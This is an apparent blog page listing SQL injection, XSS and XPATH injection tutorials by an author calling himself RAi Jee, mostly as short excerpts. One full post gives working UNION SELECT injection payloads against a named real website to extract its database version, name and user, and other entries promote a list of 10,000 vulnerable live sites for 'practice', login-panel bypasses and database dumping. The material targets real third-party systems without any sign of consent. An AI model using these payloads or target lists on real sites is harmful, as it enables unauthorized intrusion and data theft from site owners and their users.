Bypassing Modern XSS WAF Filters

XSS (Cross-site Scripting) Attack is a Vulnerability that is occurs due to Failure of Input Parameters of the user and as well as the Server response of the Web Application.XSS Attack allows a attacker to insert his Malicious HTML code in the Target Website.
In the Previous Tutorials on XSS we have Learn Some Basics of XSS Attack and the usage of XSS With SQL injection.

XSS with SQL Injection

In the Previous Tutorial Ultimate Guide to XSS (Cross Site Scripting)
We have cover the basics of XSS(Cross Site Scripting) and using its payloads in our Target Sites.So in this Tutorial you will learn XSS Attack via SQL Injection.
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".

Ultimate Guide to XSS (Cross Site Scripting)

Today i'm going to Posted a Hand Guide to XSS for Newbies . 
A lot of People ask me to write Some Tutorials on XSS , so i've Decided to also cover XSS for them . 

What is XSS ?

This in known to Everyone that XSS is also Stands for Cross Site Scripting.XSS is one of The Most Web Application Common Vulnerabilities increasingly Popular in this Time which allow a Attacker to Submitting his malicious Queries or Codes in the Target Website's "Search Boxes" as well as in the Target URL.

Cookie Based Injection

In This Tutorial You will learn How to inject a Website Through Cookies.
You will Learn How to inject a website Via Cookies Step by Step Guide in this Video Tutorial.

10000 Fresh SQLi Vulnerable Websites List

Here is SQLi Fresh 10000 Vulnerable Websites for Practice. These Vulnerable Websites will Help You to Polish Your Skills.You Can Use These Sites For Increasing Your Skills In SQLi and For Tutorials keep In Touch with www.raijee1337.blogspot.com.You can Also Comment Your Questions in case Of  Any Problem While Injecting .

Alternative Ways For Counting Columns At One Request

In this Tutorial I'm Going To Discuss On How many There are Ways for Counting All Columns At one Request.Simply we use ORDER BY Command For Counting Columns One By One and It take Time But All The Time we are looking for Easy Ways.So This Guide Will Help You In That Case.
I will Tell You Guys Some Best Ways Which Will Help you in Counting Columns.

Converting Syntax in Hex Value - SQLi Tips

After A long Time i'm Back With Another Tutorial on SQL Injection.In this Tutorial we will Discuss about Converting Syntax in Hex Value.Many Of Noobs Like me Dont know The usage of Hex Value.
Some Times In Our Regular Manually Injecting we came To such Sites where we cant Get Data from Our SQLi Command.

MSSQL Union Based Injection Part-2 - Advanced Method

In Our Previous Tutorials About MSSQL injection we Have Cover the Basic Things.
MSSQL UNION BASED INJECTION
MSSQL INJECTION USING CONVERT
MS-ACCESS INJECTION
In This Tutorial You Will Learn Some Advanced Method that will help you in Injecting.

MSSQL Injection Using Convert

In our Previous Tutorial we Have Discuss About MSSQL Union Based Injection
Now Let's Come To the Next Part. In this Tutorial You Will Learn About Injecting Site with Convert Attack.
How Actually This Command Work.This command works between two Data types and we have to give Commands to the Server with Convert then it will give That Specific Data which we have execute in the Command.

MS-Access Injection -Tutorial

In this Tutorial You Will learn How to inject into MS Access Database.
So we will start Our Injecting Manually.First we have to check if Our Target site is Vulnerable .So we will use Regular injecting Type and add Single Quote ' at the end of the Parameter.

MSSQL Union Based Injection -Step by Step Guide

 

In our Previous Tutorials we Have Discuss about MySQL and a lot of Methods of Injecting In MySQL Database.Now Let's Come To injecting MSSQL Database.
In this Tutorial we Will Discuss About MSSQL Union Based injection.Although MSSQL injection is Similiar to MySQL but Not The Same As MySQL Is Easy than MSSQL Injection.

XPATH Injection in Login Panel

In Our Previous Tutorial we have Discuss about Bypassing Login Panel With SQL Queries
But some Times when we Found SQL injection Vulnerability In Login Panel And after Executing SQL Queries There, it doesn't Give Access To the login Panel.So in SUCH cases we Will Inject The Login Panel With XPATH injection and dump admin Details from Login Panel.

XPATH Injection Using UPDATEXML

After the Discussion About XPATH Injection Using ExtractValue
Now Let's come to the Next Part. in This Tutorial you Will Learn About XPATH Injection Using UPDATEXML .
Each Site use Different Firewalls To Protect their Databases.in XPATH injection Some sites use UPDATEXML and they have Block The ExtractValue Function.So we can use there XPATH Injection With UPADTEXML.

XPATH Injection Using Extractvalue

In This Tutorial we will Discuss about XPATH Injection Using Extractvalue
While We are injecting a Site and Then Come to the UNION BASED part .When we Execute Union Based Query meanwhile we Got There a ERROR Message
"The used SELECT statements have a different number of columns"
so we Used There XPATH injection.

Bypassing Login Panel with SQL Queries

Bypassing Login Panel with SQL Queries Tutorial By RAi Jee
In This Tutorial you Will  Learn How to Bypass Login Panel with SQL Injection Queries.
So Actually we give our SQL evil Queries in Admin Panel And Then The Server Filter Our Command  and give us Access To the Admin Panel without using any username or Password.

Adding HTML Tags in SQL Queries

Adding HTML Tags in SQL Queries - Tutorial by RAi Jee
HTML Tags can be used For a lot of Fun in SQL Queries . We Can use HTML Tags to Make Color full Result in Output.Sometimes we are injecting A site and The Vulnerable Columns is in Title or in Source Page so we Can also Use HTML Tags There to Show Output on The Page.
So We Will Start Adding HTML Tags For making Output Some Color Full.
Here is a example. We wanna Print The version in RED Color So Here is our HTML TAG for Showing the Version in RED Color . 
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

lets See the  Result.Before Executing The Query First Encode HTML TAG in Hex Value or Use Single Quote Before and After The HTML Tag To Make it Executable

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+

And You can See the Version is in RED color. if we Wanna use Diffirent Colors for Each Command Like Displaying Version in RED Color ,Database in Green Color,User in Blue Color so will use Different HTML Tags for each Tasks.
See Example .
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>
So Our Final Query For Displaying Each task in Different color Will be,
Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())
See Example.
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+

And See the picture all Tasks Are complete .In this way You Can Also Display Tables and Columns in different Colors.
After Displaying SQLi Commands in Different Colors .
Now Let's See how Can We Display Data When our Vulnerable Column is in Source Page or in TiTLE  Using HTML TAGS.
When Vulnerable Column is in Source Page.
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)
so we will use this HTML TAG for Displaying Data on the Page if Our Vulnerable Columns is in Source page.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

and sometimes our Vulnerable Column is in Title so in that case we will use this HTML Tag to Print Data on the Webpage

HTML TAG:Concat(</title>,Version())

use these HTML Tags after encoding in Hex Value or PUT Single Quote before and after the HTML Tag to make the Query Executable.
Happy Injecting !!
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

Post Parameters Injection Through Live HTTP Headers

 Post Parameters Injection Through Live HTTP Headers - Tutorial By RAi Jee
In This Tutorial You Will Learn How to Inject a Website Through Post Parameters with Live HTTP Headers.
First You Need Live HTTP Headers Addon installed in Your Browser if Dont have This Addon Than You Can Installed it From This Link.

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial

Bypassing Incorrect usage of UNION and ORDER BY -Tutorial By RAi Jee
In Previous tutorial we Have Discuss about
Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted
Today's our Topic is how can we Bypass the Incorrect Usage of UNION and ORDER BY .
So Lets start our Manual Injection .Our Target Site is Vulnerable To SQL Injection.

Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial

Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial By RAi Jee

In This Tutorial You Will Learn How To Bypass the Error Allowed Memory Size of XXXX Bytes Exhaustes.

While Injecting we came to site which Gives us The Error Of Allowed Memory Size of XXXX Bytes Exhausted when we BUILD our Union Based Query.
This Error occurs Because of That PHP doesn't Left any allowed Memory.There Are a lots of Possible Causes you can Find on our Chaachu Google.

Bypassing illegal Mix of Collations- Tutorial

Bypassing illegal Mix of Collations- Tutorial by RAi Jee

We Will Continue our Tutorials About SQL.
In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.
Lets start with our Regular SQL injection.

Error Based Dump In One Shot - (DIOS)

Error Based Dump In One Shot (DIOS) - By RAi Jee

We Have Discussed in Our Previous Tutorial About Error Based SQL Injection.
In This Tutorial You Will Learn How To Build Error Based Dump In Shot ( DIOS ) .
As  We Know That in Error Based Query we Give Our Commands To server and it Gives Us result the Under a error .

Error Based Injection -Tutorial

 Error Based Injection -Tutorial BY RAi Jee
After Union Based Injection In this Tutorial You Will Learn Error Based SQL Injection.
How You Will Understand That Our Target WebSite is in Error Based Injection.??
Hmm While we are Injecting Site , And Count Total Number of Columns and Then Build our Union Based SQL Query .

Base64 Encode/Decode SQL Injection

Base64 Encode/Decode SQL Injection By RAi Jee

Today Our Topic is Base64 encoded/decoded SQLi Queries.

Here is A Example of Base64 Parameter.

Union Based SQL Injection (WAF Bypassing)

 
After Our Tutorial on Basics Of SQL Injection. 
                                       SQL Injection- Basics Of SQLi Part-1
                                       SQL Injection- Basics Of SQLi Part-2

Union based SQL injection + WAF Bypassing By RAi Jee



Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.

SQL Injection- Basics Of SQLi Part-2

                    

                   SQL Injection- Basics Of SQLi Part-1 

After Reading my First Tutorial on Basics Of SQL Injection Here is Next Tutorial .

SQL Injection- Basics Of SQLi Part-2 By RAi Jee

SQL Injection- Basics Of SQLi Part-1

SQL Injection- Basics Of SQLi Part-1 By RAi Jee

SQL( Structured Query Language ) Injection is one of Most Powerful Methods of System Penetration.

SQL Injection is a Code Injection Technique that Exploits a Security Vulnerability Occurring in the Database Layer of an Application. Attacker Send His Commands TO Web Application For Dumping Database .